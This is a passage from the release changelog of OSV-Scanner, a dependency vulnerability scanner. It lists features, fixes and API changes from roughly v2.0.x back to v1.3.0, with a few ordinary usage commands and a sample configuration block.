#2046](https://github.com/google/osv-scanner/pull/2046) Correctly set the user agent string for all outgoing requests. - [Bug #2019](https://github.com/google/osv-scanner/pull/2019) Use more natural language in the descriptions for extractor-related flags. - [Bug #1982](https://github.com/google/osv-scanner/pull/1982) Correctly parse Ubuntu package information with suffixes (e.g. `:Pro`, `:LTS`). - [Bug #2000](https://github.com/google/osv-scanner/pull/2000) Ensure CDATA content in XML is correctly outputted in guided remediation. - [Bug #1949](https://github.com/google/osv-scanner/pull/1949) Fix filtering of package types in vulnerability counts. # v2.0.3 ### Features: - [Feature #1943](https://github.com/google/osv-scanner/pull/1943) Added a flag to suppress "no package sources found" error. - [Feature #1844](https://github.com/google/osv-scanner/pull/1844) Allow flags to be passed after scan targets, e.g. `osv-scanner ./scan-this-dir --format=vertical`, by updating to cli/v3 - [Feature #1882](https://github.com/google/osv-scanner/pull/1882) Added a `stable` tag to container images for releases that follow semantic versioning. - [Feature #1846](https://github.com/google/osv-scanner/pull/1846) Experimental: Add `--experimental-extractors` and `--experimental-disable-extractors` flags to allow for more granular control over which OSV-Scalibr dependency extractors are used. ### Fixes: - [Bug #1856](https://github.com/google/osv-scanner/pull/1856) Improve XML output by guessing and matching the indentation of existing `` elements. - [Bug #1850](https://github.com/google/osv-scanner/pull/1850) Prevent escaping of single quotes in XML attributes for better readability and correctness. - [Bug #1922](https://github.com/google/osv-scanner/pull/1922) Prevent a potential panic in `MatchVulnerabilities` when the API response is nil, particularly on timeout. - [Bug #1916](https://github.com/google/osv-scanner/pull/1916) Add the "ubuntu" namespace to the debian purl type to correctly parse dpkg BOMs generated on Ubuntu. - [Bug #1871](https://github.com/google/osv-scanner/pull/1871) Ensure inventories are sorted by PURL in addition to name and version to prevent incorrect deduplication of packages. - [Bug #1919](https://github.com/google/osv-scanner/pull/1919) Improve error reporting by including the underlying error when the response body from a Maven registry cannot be read. - [Bug #1857](https://github.com/google/osv-scanner/pull/1857) Fix an issue where SPDX output is not correctly outputted because it was getting overwritten. - [Bug #1873](https://github.com/google/osv-scanner/pull/1873) Fix the GitHub Action to not ignore general errors during execution. - [Bug #1955](https://github.com/google/osv-scanner/pull/1955) Fix issue causing error messages to be spammed when not running in a git repository. - [Bug #1930](https://github.com/google/osv-scanner/pull/1930) Fix issue where Maven client loses auth data during extraction. ### Misc: - Update dependencies and updated golang to 1.24.4 # v2.0.2 ### Fixes: - [Bug #1842](https://github.com/google/osv-scanner/pull/1842) Fix an issue in the GitHub Action where call analysis for Go projects using the `tool` directive (Go 1.24+) in `go.mod` files would fail. The scanner image has been updated to use a newer Go version. - [Bug #1806](https://github.com/google/osv-scanner/pull/1806) Fix an issue where license overrides were not correctly reflected in the final scan results and license summary. - [Fix #1825](https://github.com/google/osv-scanner/pull/1825), [#1809](https://github.com/google/osv-scanner/pull/1809), [#1805](https://github.com/google/osv-scanner/pull/1805), [#1803](https://github.com/google/osv-scanner/pull/1803), [#1787](https://github.com/google/osv-scanner/pull/1787) Enhance XML output stability and consistency by preserving original spacing and minimizing unnecessary escaping. This helps reduce differences when XML files are processed. # v2.0.1 ### Features: - [Feature #1730](https://github.com/google/osv-scanner/pull/1730) Add support for extracting dependencies from .NET `packages.config` and `packages.lock.json` files. - [Feature #1770](https://github.com/google/osv-scanner/pull/1770) Add support for extracting dependencies from rust binaries compiled with cargo-auditable. - [Feature #1761](https://github.com/google/osv-scanner/pull/1761) Improve output when scanning for OS packages, we now show binary packages associated with a source package in the table output. ### Fixes: - [Bug #1752](https://github.com/google/osv-scanner/pull/1752) Fix paging depth issue when querying the osv.dev API. - [Bug #1747](https://github.com/google/osv-scanner/pull/1747) Ensure osv-reporter prints warnings instead of errors for certain messages to return correct exit code (related to [osv-scanner-action#65](https://github.com/google/osv-scanner-action/issues/65)). - [Bug #1717](https://github.com/google/osv-scanner/pull/1717) Fix issue where nested CycloneDX components were not being parsed. - [Bug #1744](https://github.com/google/osv-scanner/pull/1744) Fix issue where empty CycloneDX SBOMs was causing a panic. - [Bug #1726](https://github.com/google/osv-scanner/pull/1726) De-duplicate references in CycloneDX report output for improved validity. - [Bug #1727](https://github.com/google/osv-scanner/pull/1727) Remove automatic opening of HTML reports in the browser (fixes [#1721](https://github.com/google/osv-scanner/issues/1721)). - [Bug #1735](https://github.com/google/osv-scanner/pull/1735) Require a tag when scanning container images to prevent potential errors. ### Docs: - [Docs #1753](https://github.com/google/osv-scanner/pull/1753) Correct documentation for the OSV-Scanner GitHub Action (fixes [osv-scanner-action#68](https://github.com/google/osv-scanner-action/issues/68)). - [Docs #1743](https://github.com/google/osv-scanner/pull/1743) Minor grammar fixes in documentation. ### API Changes: - [API Change #1763](https://github.com/google/osv-scanner/pull/1763) Made the SourceType enum public. # OSV-Scanner v2.0.0 This release merges the improvements, features, and fixes from v2.0.0-rc1, v2.0.0-beta2, and v2.0.0-beta1. **Important:** This release includes several breaking changes aimed at future-proofing OSV-Scanner. Please consult our comprehensive **[Migration Guide](https://google.github.io/osv-scanner/migration-guide.html)** to ensure a smooth upgrade. ### Features: - **Layer and base image-aware container scanning:** - Rewritten support for Debian, Ubuntu, and Alpine container images. - Layer level analysis and vulnerability breakdown. - Supports Go, Java, Node, and Python artifacts within supported distros. - Base image identification via `deps.dev`. - Usage: `osv-scanner scan image :` - **Interactive HTML output:** - Severity breakdown, package/ID/importance filtering, vulnerability details. - Container image layer filtering, layer info, base image identification. - Usage: `osv-scanner scan --serve ...` - **Guided Remediation for Maven pom.xml:** - Remediate direct and transitive dependencies (non-interactive mode). - New `override` remediation strategy. - Support for reading/writing `pom.xml` and parent POM files. - Private registry support for Maven metadata. - Machine-readable output for guided remediation. - **Enhanced Dependency Extraction with `osv-scalibr`:** - Haskell: `cabal.project.freeze`, `stack.yaml.lock` - .NET: `deps.json` - Python: `uv.lock` - Artifacts: `node_module`s, Python wheels, Java uber jars, Go binaries - [Feature #1636](https://github.com/google/osv-scanner/pull/1636) `osv-scanner update` command for updating the local vulnerability database (formerly experimental). - [Feature #1582](https://github.com/google/osv-scanner/pull/1582) Add container scanning information to vertical output format. - [Feature #1587](https://github.com/google/osv-scanner/pull/1587) Add support for severity in SARIF report format. - [Feature #1569](https://github.com/google/osv-scanner/pull/1569) Add support for `bun.lock` lockfiles. - [Feature #1547](https://github.com/google/osv-scanner/pull/1547) Add experimental config support to the `scan image` command. - [Feature #1557](https://github.com/google/osv-scanner/pull/1557) Allow setting port number with `--serve` using the new `--port` flag. ### Breaking Changes: - [Feature #1670](https://github.com/google/osv-scanner/pull/1670) Guided remediation now defaults to non-interactive mode; use the `--interactive` flag for interactive mode. - [Feature #1670](https://github.com/google/osv-scanner/pull/1686) Removed the `--verbosity=verbose` verbosity level. - [Feature #1673](https://github.com/google/osv-scanner/pull/1673) & [Feature #1664](https://github.com/google/osv-scanner/pull/1664) All previous experimental flags are now out of experimental, and the experimental flag mechanism has been removed. - [Feature #1651](https://github.com/google/osv-scanner/pull/1651) Multiple license flags have been merged into a single `--license` flag. - [Feature #1666](https://github.com/google/osv-scanner/pull/1666) API: `reporter` removed; logging now uses `slog`, which can be overridden. - [Feature #1638](https://github.com/google/osv-scanner/pull/1638) API: Deprecated packages removed, including `lockfile` (migrated to `OSV-Scalibr`). ### Improvements: - [Feature #1561](https://github.com/google/osv-scanner/pull/1561) Updated HTML report for better contrast and usability (from beta2). - [Feature #1584](https://github.com/google/osv-scanner/pull/1584) Make skipping the root git repository the default behavior (from beta2). - [Feature #1648](https://github.com/google/osv-scanner/pull/1648) Updated HTML report styling to improve contrast (from rc1). ### Fixes: - [Fix #1598](https://github.com/google/osv-scanner/pull/1598) Fix table output vulnerability ordering. - [Fix #1616](https://github.com/google/osv-scanner/pull/1616) Filter out Ubuntu unimportant vulnerabilities. - [Fix #1585](https://github.com/google/osv-scanner/pull/1585) Fixed issue where base images are occasionally duplicated. - [Fix #1597](https://github.com/google/osv-scanner/pull/1597) Fixed issue where SBOM parsers are not correctly parsing CycloneDX files when using the `bom.xml` filename. - [Fix #1566](https://github.com/google/osv-scanner/pull/1566) Fixed issue where offline scanning returns different results from online scanning. - [Fix #1538](https://github.com/google/osv-scanner/pull/1538) Reduce memory usage when using guided remediation. We encourage everyone to upgrade to OSV-Scanner v2.0.0 and experience these powerful new capabilities! As always, your feedback is invaluable, so please don't hesitate to share your thoughts and suggestions. - [General V2 feedback](https://github.com/google/osv-scanner/discussions/1529) - [Container scanning feedback](https://github.com/google/osv-scanner/discussions/1521) # v2.0.0-rc1 Our first release candidate for OSV-Scanner V2, which includes various breaking changes osv-scanner to help future proof osv-scanner in V2! See the changelog for beta1 and beta2 for the full list of changes. We've also added a migration guide here: https://google.github.io/osv-scanner/migration-guide.html ### Changes: - [Feature #1670](https://github.com/google/osv-scanner/pull/1670) Guided remediation now makes non-interactive the default mode, and adds the `--interactive` flag. - [Feature #1670](https://github.com/google/osv-scanner/pull/1686) Removes the `--verbosity=verbose` verbosity level. - [Feature #1673](https://github.com/google/osv-scanner/pull/1673) & [Feature #1664](https://github.com/google/osv-scanner/pull/1664) Moves all our experimental flags out of experimental, and removes the experimental flags. - [Feature #1651](https://github.com/google/osv-scanner/pull/1651) License flags have been merged into a single license flag. See `--help` or migration guide for more details. ### Features: - [Feature #1636](https://github.com/google/osv-scanner/pull/1636) `osv-scanner update` command has been released as an experimental feature. - [Feature #1582](https://github.com/google/osv-scanner/pull/1582) Add container scanning related information to vertical output format. - [Feature #1587](https://github.com/google/osv-scanner/pull/1587) Add support for severity in SARIF report format. ### Fixes - [Fix #1677](https://github.com/google/osv-scanner/pull/1677) Fix OS filter for HTML report. - [Fix #1598](https://github.com/google/osv-scanner/pull/1598) Fix table output vulnerability ordering. - [Fix #1661](https://github.com/google/osv-scanner/pull/1661) Add spinner to iframs in the HTML report. - [Fix #1648](https://github.com/google/osv-scanner/pull/1648) Updated HTML report styling to improve contrast. - [Fix #1616](https://github.com/google/osv-scanner/pull/1616) Display git scanning results in HTML report. - [Fix #1616](https://github.com/google/osv-scanner/pull/1616) Filter out Ubuntu unimportant vulnerabilities. ### API changes - [Feature #1666](https://github.com/google/osv-scanner/pull/1666) Removes `reporter`, all logging now goes through slog, which you can override to change the output. - [Feature #1638](https://github.com/google/osv-scanner/pull/1638) All deprecated packages have been removed from the osv-scanner module, this includes the `lockfile` package, which has been migrated to the `OSV-Scalibr` library. # v2.0.0-beta2 This second beta release brings a series of fixes and improvements to the previous release. ### Improvements: - [Feature #1561](https://github.com/google/osv-scanner/pull/1561) Updated HTML report for better contrast and usability - [Feature #1569](https://github.com/google/osv-scanner/pull/1569) Add support for bun.lock lockfiles. - [Feature #1584](https://github.com/google/osv-scanner/pull/1584) Make skip root git repository the default behavior. - [Feature #1547](https://github.com/google/osv-scanner/pull/1547) Add experimental config support to the image command. - [Feature #1557](https://github.com/google/osv-scanner/pull/1557) Allow setting port number when using the `--serve` flag with the new `--port` flag. ### Fixes - [Fix #1585](https://github.com/google/osv-scanner/pull/1585) Fixed issue where base images are occasionally duplicated. - [Fix #1597](https://github.com/google/osv-scanner/pull/1597) Fixed issue where SBOM parsers are not correctly parsing CycloneDX files when using the `bom.xml` filename. - [Fix #1566](https://github.com/google/osv-scanner/pull/1566) Fixed issue where offline scanning returns different results from online scanning. - [Fix #1538](https://github.com/google/osv-scanner/pull/1538) Reduce memory usage when using guided remediation. # v2.0.0-beta1 The first beta of OSV-Scanner V2 is here! This beta release introduces significant enhancements, including refactored dependency extraction capabilities, container image scanning, and guided remediation for Maven. This beta release does _not_ introduce any breaking CLI changes and the beta period is expected to last approximately one month. However, as this is a beta release, there may be breaking changes breaking changes in the final release compared to the first beta. We encourage you to try out these new features and would appreciate any feedback you might have on our discussion topics: - [General V2 feedback](https://github.com/google/osv-scanner/discussions/1529) - [Container scanning feedback](https://github.com/google/osv-scanner/discussions/1521) ### Layer and base image-aware container scanning A significant new feature is a rewritten, layer-aware container scanning support for Debian, Ubuntu, and Alpine container images. OSV-Scanner can now analyze container images to provide: - Layers where a package was first introduced - Layer history and commands - Base images the image is based on - OS/Distro the container is running on This layer analysis leverages [OSV-Scalibr](https://github.com/google/osv-scalibr), and supports the following OSes and languages: | Distro Support | Language Artifacts Support | | -------------- | -------------------------- | | Alpine OS | Go | | Debian | Java | | Ubuntu | Node | | | Python | Base image identification also leverages a new experimental API provided by https://deps.dev. For usage, run the new `scan image` command: ``` osv-scanner scan image : ``` Check out our [documentation](https://google.github.io/osv-scanner/usage/scan-image) for more details. ### Interactive HTML output A new, interactive HTML output is now available. This provides a lot more interactivity and information compared to terminal only outputs, including: - Severity breakdown - Package and ID filtering - Vulnerability importance filtering - Full vulnerability advisory entries And additionally for container image scanning: - Layer filtering - Image layer information - Base image identification ![Screenshot of HTML output for container image scanning](./docs/images/html-container-output.png) ### Guided Remediation for Maven pom.xml Last year we released a feature called [guided remediation](https://osv.dev/blog/posts/announcing-guided-remediation-in-osv-scanner/) for npm. We have now expanded support to Maven pom.xml. With guided remediation support for Maven, you can remediate vulnerabilities in both direct and transitive dependencies through direct version updates or overriding versions through dependency management. We’ve introduced a few new features for our Maven support: - A new remediation strategy `override` is introduced. - Support for reading and writing pom.xml files, including writing changes to local parent pom files. - Private registry can be specified to fetch Maven metadata. The guided remediation support for Maven is only available in the non-interactive mode. For basic usage, run the following command: ``` osv-scanner fix --non-interactive --strategy=override -M path/to/pom.xml ``` We also introduced machine readable output for guided remediation that makes it easier to integrate guided remediation into your workflow. For more usage details on guided remediation, please see our [documentation](https://google.github.io/osv-scanner/experimental/guided-remediation/). ### Enhanced Dependency Extraction with `osv-scalibr` With the help from [OSV-Scalibr](https://github.com/google/osv-scalibr), we now also have expanded support for the kinds of dependencies we can extract from projects and containers: #### Source manifests and lockfiles - Haskell: `cabal.project.freeze`, `stack.yaml.lock` - .NET: `deps.json` - Python: `uv.lock` #### Artifacts - node_modules - Python wheels - Java uber jars - Go binaries The full list of supported formats can be found [here](https://google.github.io/osv-scanner/supported-languages-and-lockfiles/). The first beta doesn’t enable every single extractor currently available in OSV-Scalibr today. We’ll continue to add more leading up to the final 2.0.0 release. OSV-Scalibr also makes it incredibly easy to add new extractors. Please file a [feature request](https://github.com/google/osv-scalibr/issues) if a format you’re interested in is missing! # v1.9.1 ### Features: - [Feature #1295](https://github.com/google/osv-scanner/pull/1295) Support offline database in fix subcommand. - [Feature #1342](https://github.com/google/osv-scanner/pull/1342) Add `--experimental-offline-vulnerabilities` and `--experimental-no-resolve` flags. - [Feature #1045](https://github.com/google/osv-scanner/pull/1045) Support private registries for Maven. - [Feature #1226](https://github.com/google/osv-scanner/pull/1226) Support support `vulnerabilities.ignore` in package overrides. ### Fixes: - [Bug #604](https://github.com/google/osv-scanner/pull/604) Use correct path separator in SARIF output when on Windows. - [Bug #330](https://github.com/google/osv-scanner/pull/330) Warn about and ignore duplicate entries in SBOMs. - [Bug #1325](https://github.com/google/osv-scanner/pull/1325) Set CharsetReader and Entity when reading pom.xml. - [Bug #1310](https://github.com/google/osv-scanner/pull/1310) Update spdx license ids. - [Bug #1288](https://github.com/google/osv-scanner/pull/1288) Sort sbom packages by PURL. - [Bug #1285](https://github.com/google/osv-scanner/pull/1285) Improve handling if `docker` exits with a non-zero code when trying to scan images ### API Changes: - Deprecate auxillary public packages: As part of the V2 update described above, we have started deprecating some of the auxillary packages which are not commonly used to give us more room to make better API designs. These include: - `config` - `depsdev` - `grouper` - `spdx` # v1.9.0 ### Features: - [Feature #1243](https://github.com/google/osv-scanner/pull/1243) Allow explicitly ignoring the license of a package in config with `license.ignore = true`. - [Feature #1249](https://github.com/google/osv-scanner/pull/1249) Error if configuration file has unknown properties. - [Feature #1271](https://github.com/google/osv-scanner/pull/1271) Assume `.txt` files with "requirements" in their name are `requirements.txt` files ### Fixes: - [Bug #1242](https://github.com/google/osv-scanner/pull/1242) Announce when a config file is invalid and exit with a non-zero code. - [Bug #1241](https://github.com/google/osv-scanner/pull/1241) Display `(no reason given)` when there is no reason in the override config. - [Bug #1252](https://github.com/google/osv-scanner/pull/1252) Don't allow `LoadPath` to be set via config file. - [Bug #1279](https://github.com/google/osv-scanner/pull/1279) Report all ecosystems without local databases in one single line. - [Bug #1283](https://github.com/google/osv-scanner/pull/1283) Output invalid PURLs when scanning SBOMs. - [Bug #1278](https://github.com/google/osv-scanner/pull/1278) Apply go version override to _all_ instances of the `stdlib`. ### Misc: - [#1253](https://github.com/google/osv-scanner/pull/1253) Deprecate `ParseX()` functions in `pkg/lockfile` in favor of their `Extract` equivalents. - [#1290](https://github.com/google/osv-scanner/pull/1290) Bump maximum number of concurrent requests to the OSV.dev API. # v1.8.5: ### Features: - [Feature #1160](https://github.com/google/osv-scanner/pull/1160) Support fetching snapshot versions from a Maven registry. - [Feature #1177](https://github.com/google/osv-scanner/pull/1177) Support composite-based package overrides. This allows for ignoring entire manifests when scanning. - [Feature #1210](https://github.com/google/osv-scanner/pull/1210) Add FIXED-VULN-IDS to guided remediation non-interactive output. ### Fixes: - [Bug #1220](https://github.com/google/osv-scanner/issues/1220) Fix govulncheck calls on C code. - [Bug #1236](https://github.com/google/osv-scanner/pull/1236) Alpine package scanning now falls back to latest release version if no release version can be found. # v1.8.4: ### Features: - [Feature #1177](https://github.com/google/osv-scanner/pull/1177) Adds `--upgrade-config` flag for configuring allowed upgrades on a per-package basis. Also hide & deprecate previous `--disallow-major-upgrades` and `--disallow-package-upgrades` flags. ### Fixes: - [Bug #1123](https://github.com/google/osv-scanner/issues/1123) Issue when running osv-scanner on project running with golang 1.22 #1123 ### Misc: - [Feature #638](https://github.com/google/osv-scanner/issues/638) Update go policy to use stable go version for builds (updated to go 1.23) # v1.8.3: ### Features: - [Feature #889](https://github.com/google/osv-scanner/pull/889) OSV-Scanner now provides "vertical" output format! ### Fixes: - [Bug #1115](https://github.com/google/osv-scanner/issues/1115) Ensure that `semantic` is passed a valid `models.Ecosystem`. - [Bug #1140](https://github.com/google/osv-scanner/pull/1140) Add Maven dependency management to override client. - [Bug #1149](https://github.com/google/osv-scanner/pull/1149) Handle Maven parent relative path. ### Misc: - [Feature #1091](https://github.com/google/osv-scanner/pull/1091) Improved the runtime of DiffVulnerabilityResults. Thanks @neilnaveen! - [Feature #1125](https://github.com/google/osv-scanner/pull/1125) Workflow for stale issue and PR management. # v1.8.2: ### Features: - [Feature #1014](https://github.com/google/osv-scanner/pull/1014) Adding CycloneDX 1.4 and 1.5 output format. Thanks @marcwieserdev! ### Fixes: - [Bug #769](https://github.com/google/osv-scanner/issues/769) Fixed missing vulnerabilities for debian purls for `--experimental-local-db`. - [Bug #1055](https://github.com/google/osv-scanner/issues/1055) Ensure that `package` exists in `affected` property. - [Bug #1072](https://github.com/google/osv-scanner/issues/1072) Filter out unimportant vulnerabilities from vuln group. - [Bug #1077](https://github.com/google/osv-scanner/issues/1077) Fix rate osv-scanner deadlock. - [Bug #924](https://github.com/google/osv-scanner/issues/924) Ensure that npm dependencies retain their "production" grouping. # v1.8.0/v1.8.1: ### Features: - [Feature #35](https://github.com/google/osv-scanner/issues/35) OSV-Scanner now scans transitive dependencies in Maven `pom.xml` files! See [our documentation](https://google.github.io/osv-scanner/supported-languages-and-lockfiles/#transitive-dependency-scanning) for more information. - [Feature #944](https://github.com/google/osv-scanner/pull/944) The `osv-scanner.toml` configuration file can now filter specific packages with new `[[PackageOverrides]]` sections: ```toml [[PackageOverrides]] # The package name, version, and ecosystem to match against name = "lib" # If version is not set or empty, it will match every version version = "1.0.0" ecosystem = "Go" # Ignore this package entirely, including license scanning ignore = true # Override the license of the package # This is not used if ignore = true license.override = ["MIT", "0BSD"] # effectiveUntil = 2022-11-09 # Optional exception expiry date reason = "abc" ``` ### Minor Updates - [Feature #1039](https://github.com/google/osv-scanner/pull/1039) The `--experimental-local-db` flag has been removed and replaced with a new flag `--experimental-download-offline-databases` which better reflects what the flag does. To replicate the behavior of the original `--experimental-local-db` flag, replace it with both `--experimental-offline --experimental-download-offline-databases` flags. This will run osv-scanner in offline mode, but download the latest version of the vulnerability databases before scanning. ### Fixes: - [Bug #1000](https://github.com/google/osv-scanner/pull/1000) Standard dependencies now correctly override `dependencyManagement` dependencies when scanning `pom.xml` files in offline mode. # v1.7.4: ### Features: - [Feature #943](https://github.com/google/osv-scanner/pull/943) Support scanning gradle/verification-metadata.xml files. ### Misc: - [Bug #968](https://github.com/google/osv-scanner/issues/968) Hide unimportant Debian vulnerabilities to reduce noise. # v1.7.3: ### Features: - [Feature #934](https://github.com/google/osv-scanner/pull/934) add support for PNPM v9 lockfiles. ### Fixes: - [Bug #938](https://github.com/google/osv-scanner/issues/938) Ensure the sarif output has a stable order. - [Bug #922](https://github.com/google/osv-scanner/issues/922) Support filtering on alias IDs in Guided Remediation. # v1.7.2: ### Fixes: - [Bug #899](https://github.com/google/osv-scanner/issues/899) Guided Remediation: Parse paths in npmrc auth fields correctly. - [Bug #908](https://github.com/google/osv-scanner/issues/908) Fix rust call analysis by explicitly disabling stripping of debug info. - [Bug #914](https://github.com/google/osv-scanner/issues/914) Fix regression for go call analysis introduced in 1.7.0. # v1.7.1: (There is no Github release for this version) ### Fixes - [Bug #856](https://github.com/google/osv-scanner/issues/856) Add retry logic to make calls to OSV.dev API more resilient. This combined with changes in OSV.dev's API should result in much less timeout errors. ### API Features - [Feature #781](https://github.com/google/osv-scanner/pull/781) add `MakeVersionRequestsWithContext()` - [Feature #857](https://github.com/google/osv-scanner/pull/857) API and networking related errors now has their own error and exit code (Exit Code 129) # v1.7.0: ### Features - [Feature #352](https://github.com/google/osv-scanner/issues/352) Guided Remediation Introducing our new experimental guided remediation feature on `osv-scanner fix` subcommand. See our [docs](https://google.github.io/osv-scanner/experimental/guided-remediation/) for detailed usage instructions. - [Feature #805](https://github.com/google/osv-scanner/pull/805) Include CVSS MaxSeverity in JSON output. ### Fixes - [Bug #818](https://github.com/google/osv-scanner/pull/818) Align GoVulncheck Go version with go.mod. - [Bug #797](https://github.com/google/osv-scanner/pull/797) Don't traverse gitignored dirs for gitignore files. ### Miscellaneous - [#831](https://github.com/google/osv-scanner/pull/831) Remove version number from the release binary name. # v1.6.2: ### Features - [Feature #694](https://github.com/google/osv-scanner/pull/694) Add subcommands! OSV-Scanner now has subcommands! The base command has been moved to `scan` (currently the only commands is `scan`). By default if you do not pass in a command, `scan` will be used, so CLI remains backwards compatible. This is a building block to adding the guided remediation feature. See [issue #352](https://github.com/google/osv-scanner/issues/352) for more details! - [Feature #776](https://github.com/google/osv-scanner/pull/776) Add pdm lockfile support. ### API Features - [Feature #754](https://github.com/google/osv-scanner/pull/754) Add dependency groups to flattened vulnerabilities output. # v1.6.0: ### Features - [Feature #694](https://github.com/google/osv-scanner/pull/694) Add support for NuGet lock files version 2. - [Feature #655](https://github.com/google/osv-scanner/pull/655) Scan and report dependency groups (e.g. "dev dependencies") for vulnerabilities. - [Feature #702](https://github.com/google/osv-scanner/pull/702) Created an option to skip/disable upload to code scanning. - [Feature #732](https://github.com/google/osv-scanner/pull/732) Add option to not fail on vulnerability being found for GitHub Actions. - [Feature #729](https://github.com/google/osv-scanner/pull/729) Verify the spdx licenses passed in to the license allowlist. ### Fixes - [Bug #736](https://github.com/google/osv-scanner/pull/736) Show ecosystem and version even if git is shown if the info exists. - [Bug #703](https://github.com/google/osv-scanner/pull/703) Return an error if both license scanning and local/offline scanning is enabled simultaneously. - [Bug #718](https://github.com/google/osv-scanner/pull/718) Fixed parsing of SBOMs generated by the latest CycloneDX. - [Bug #704](https://github.com/google/osv-scanner/pull/704) Get go stdlib version from go.mod. ### API Features - [Feature #727](https://github.com/google/osv-scanner/pull/727) Changes to `Reporter` methods to add verbosity levels and to deprecate functions. # v1.5.0: ### Features - [Feature #501](https://github.com/google/osv-scanner/pull/501) Add experimental license scanning support! See https://osv.dev/blog/posts/introducing-license-scanning-with-osv-scanner/ for more information! - [Feature #642](https://github.com/google/osv-scanner/pull/642) Support scanning `renv` files for the R language ecosystem. - [Feature #513](https://github.com/google/osv-scanner/pull/513) Stabilize call analysis for Go! The experimental `--experimental-call-analysis` flag has now been updated to: ``` --call-analysis= --no-call-analysis= ``` with call analysis for Go enabled by default. See https://google.github.io/osv-scanner/usage/#scanning-with-call-analysis for the documentation! - [Feature #676](https://github.com/google/osv-scanner/pull/676) Simplify return codes: - Return 0 if there are no findings or errors. - Return 1 if there are any findings (license violations or vulnerabilities). - Return 128 if no packages are found. - [Feature #651](https://github.com/google/osv-scanner/pull/651) CVSS v4.0 support. - [Feature #60](https://github.com/google/osv-scanner/pull/60) [Pre-commit hook](https://pre-commit.com/) support. ### Fixes - [Bug #639](https://github.com/google/osv-scanner/issues/639) We now filter local packages from scans, and report the filtering of those packages. - [Bug #645](https://github.com/google/osv-scanner/issues/645) Properly handle file/url paths on Windows. - [Bug #660](https://github.com/google/osv-scanner/issues/660) Remove noise from failed lockfile parsing. - [Bug #649](https://github.com/google/osv-scanner/issues/649) No longer include vendored libraries in C/C++ package analysis. - [Bug #634](https://github.com/google/osv-scanner/issues/634) Fix filtering of aliases to also include non OSV aliases ### Miscellaneous - The minimum go version has been updated to go1.21 from go1.18. # v1.4.3: ### Features - [Feature #621](https://github.com/google/osv-scanner/pull/621) Add support for scanning vendored C/C++ files. - [Feature #581](https://github.com/google/osv-scanner/pull/581) Scan submodules commit hashes. ### Fixes - [Bug #626](https://github.com/google/osv-scanner/issues/626) Fix gitignore matching for root directory - [Bug #622](https://github.com/google/osv-scanner/issues/622) Go binary not found should not be an error - [Bug #588](https://github.com/google/osv-scanner/issues/588) handle npm/yarn aliased packages - [Bug #607](https://github.com/google/osv-scanner/pull/607) fix: remove some extra newlines in sarif report # v1.4.2: ### Fixes - [Bug #574](https://github.com/google/osv-scanner/issues/574) Support versions with build metadata in `yarn.lock` files - [Bug #599](https://github.com/google/osv-scanner/issues/599) Add name field to sarif rule output # v1.4.1: ### Features - [Feature #534](https://github.com/google/osv-scanner/pull/534) New SARIF format that separates out individual vulnerabilities, see https://github.com/google/osv-scanner/issues/216 - [Experimental Feature #57](https://github.com/google/osv-scanner/issues/57) Experimental Github Action! Have a look at https://google.github.io/osv-scanner/experimental/ for how to use the new Github Action in your repo. Experimental, so might change with only a minor update. ### API Features - [Feature #557](https://github.com/google/osv-scanner/pull/557) Add new ecosystems, and a slice containing all of them. # v1.4.0: ### Features - [Feature #183](https://github.com/google/osv-scanner/pull/183) Add (experimental) offline mode! See [our documentation](https://google.github.io/osv-scanner/experimental/#offline-mode) for how to use it. - [Feature #452](https://github.com/google/osv-scanner/pull/452) Add (experimental) rust call analysis, detect whether vulnerable functions are actually called in your Rust project! See [our documentation](https://google.github.io/osv-scanner/experimental/#call-analysis-in-rust) for limitations and how to use this. - [Feature #484](https://github.com/google/osv-scanner/pull/484) Detect the installed `go` version and checks for vulnerabilities in the standard library. - [Feature #505](https://github.com/google/osv-scanner/pull/505) OSV-Scanner doesn't support your lockfile format? You can now use your own parser for your format, and create an intermediate `osv-scanner.json` for osv-scanner to scan. See [our documentation](https://google.github.io/osv-scanner/usage/#custom-lockfiles) for instructions. ### API Features - [Feature #451](https://github.com/google/osv-scanner/pull/451) The lockfile package now support extracting dependencies directly from any io.Reader, removing the requirement of a file path. ### Fixes - [Bug #457](https://github.com/google/osv-scanner/pull/457) Fix PURL mapping for Alpine packages - [Bug #462](https://github.com/google/osv-scanner/pull/462) Use correct plural and singular forms based on count # v1.3.6: ### Minor Updates - [Feature #431](https://github.com/google/osv-scanner/pull/431) Update GoVulnCheck integration. - [Feature #439](https://github.com/google/osv-scanner/pull/439) Create `models.PURLToPackage()`, and deprecate `osvscanner.PURLToPackage()`. ### Fixes - [Feature #439](https://github.com/google/osv-scanner/pull/439) Fix `PURLToPackage` not returning the full namespace of packages in ecosystems that use them (e.g. golang). # v1.3.5: ### Features - [Feature #409](https://github.com/google/osv-scanner/pull/409) Adds an additional column to the table output which shows the severity if available. ### API Features - [Feature #424](https://github.com/google/osv-scanner/pull/424) - [Feature #417](https://github.com/google/osv-scanner/pull/417) - [Feature #417](https://github.com/google/osv-scanner/pull/417) - Update the models package to better reflect the osv schema, including: - Add the withdrawn field - Improve timestamp serialization - Add related field - Add additional ecosystem constants - Add new reference types - Add YAML tags # v1.3.4: ### Minor Updates - [Feature #390](https://github.com/google/osv-scanner/pull/390) Add an user agent to OSV API requests. # v1.3.3: ### Fixes - [Bug #369](https://github.com/google/osv-scanner/issues/369) Fix requirements.txt misparsing lines that contain `--hash`. - [Bug #237](https://github.com/google/osv-scanner/issues/237) Clarify when no vulnerabilities are found. - [Bug #354](https://github.com/google/osv-scanner/issues/354) Fix cycle in requirements.txt causing infinite recursion. - [Bug #367](https://github.com/google/osv-scanner/issues/367) Fix panic when parsing empty lockfile. ### API Features - [Feature #357](https://github.com/google/osv-scanner/pull/357) Update `pkg/osv` to allow overriding the http client / transport # v1.3.2: ### Fixes - [Bug #341](https://github.com/google/osv-scanner/pull/341) Make the reporter public to allow calling DoScan with non nil reporters. - [Bug #335](https://github.com/google/osv-scanner/issues/335) Improve SBOM parsing and relaxing name requirements when explicitly scanning with `--sbom`. - [Bug #333](https://github.com/google/osv-scanner/issues/333) Improve scanning speed for regex heavy lockfiles by caching regex compilation. - [Bug #349](https://github.com/google/osv-scanner/pull/349) Improve SBOM documentation and error messages. # v1.3.1: ### Fixes - [Bug #319](https://github.com/google/osv-scanner/issues/319) Fix segmentation fault when parsing CycloneDX without dependencies. # v1.3.0: ### Major Features: - [Feature #198](https://github.com/google/osv-scanner/pull/198) GoVulnCheck integration! Try it out when scanning go code by adding the `--experimental-call-analysis` flag. - [Feature #260](https://github.com/google/osv-scanner/pull/198) Support `-r` flag in `requirements.txt` files. - [Feature #300](https://github.com/google/osv-scanner/pull/300) 